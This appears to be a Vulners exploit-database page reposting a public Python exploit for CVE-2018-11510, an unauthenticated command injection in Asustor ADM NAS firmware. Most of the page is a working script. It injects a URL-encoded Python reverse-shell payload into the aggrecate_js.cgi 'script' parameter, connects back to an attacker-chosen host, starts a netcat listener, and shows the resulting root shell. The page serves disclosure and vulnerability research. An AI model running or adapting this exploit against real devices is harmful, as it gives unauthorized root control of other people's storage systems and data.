Vulners
Lucene search
ADM 3.1.2RHG1 - Remote Code Execution Exploit
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection Vulnerabilities | 15 Aug 201800:00 | – | zdt |
 | CVE-2018-11510 | 17 Aug 201815:14 | – | circl |
 | ASURTOR NAS ADM Remote Command Execution Vulnerability | 3 Jul 201800:00 | – | cnvd |
 | Asustor ADM Command Injection (CVE-2018-11510) | 19 Jun 201800:00 | – | checkpoint_advisories |
 | CVE-2018-11510 | 28 Jun 201814:00 | – | cve |
 | CVE-2018-11510 | 28 Jun 201814:00 | – | cvelist |
 | ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection | 15 Aug 201800:00 | – | exploitdb |
| ADM 3.1.2RHG1 - Remote Code Execution | 17 Aug 201800:00 | – | exploitdb |
 | ADM 3.1.2RHG1 - Remote Code Execution | 17 Aug 201800:00 | – | exploitpack |
| ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution SQL Injection | 15 Aug 201800:00 | – | exploitpack |
10
# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
# Author: Matthew Fulton & Kyle Lovett
# Vendor Homepage: https://www.asustor.com/
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
# Version: <= ADM 3.1.2RHG1
# Tested on: ASUSTOR AS6202T
# CVE : CVE-2018-11510
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
#!/usr/bin/python
"""
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
if exploitation occurs successfully, a root shell is granted
Authors: matthew fulton and Kyle Lovett
Date: 27 May 2018
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
After a twitter communication Kyle was kind enough to share a few details
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
Vendor link: https://www.asustor.com
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
starting netcat listener on port 1234
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # uname -a;id
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
"""
import sys, threading, time, os, subprocess
import urllib2
import ssl
import argparse
class exploit(object):
def __init__(self,interval=1):
self.target = args.target
self.rport = args.port
self.lport = args.lport
self.remote = args.remote
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
#ignore ssl warnings
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
try:
turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
response=urllib2.urlopen(turl,context=ctx)
time.sleep(self.interval)
except urllib2.URLError as e:
print "Something is wrong:|"
print e
os._exit(1)
def revShell():
print "starting netcat listener on port "+args.lport
cmd = "nc -lv {0}".format(args.lport)
os.system(cmd)
def main():
print """exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
goexploit = exploit()
revShell()
if __name__ == '__main__':
Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
parser=argparse.ArgumentParser(description=help)
parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
parser.add_argument('--port', '-p', default="8001")
parser.add_argument('--lport', '-l', default="1234")
parser.add_argument('--remote','-r', default="192.168.1.253")
args = parser.parse_args()
main()
# 0day.today [2018-08-17] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2018 00:00Current
EPSS0.88131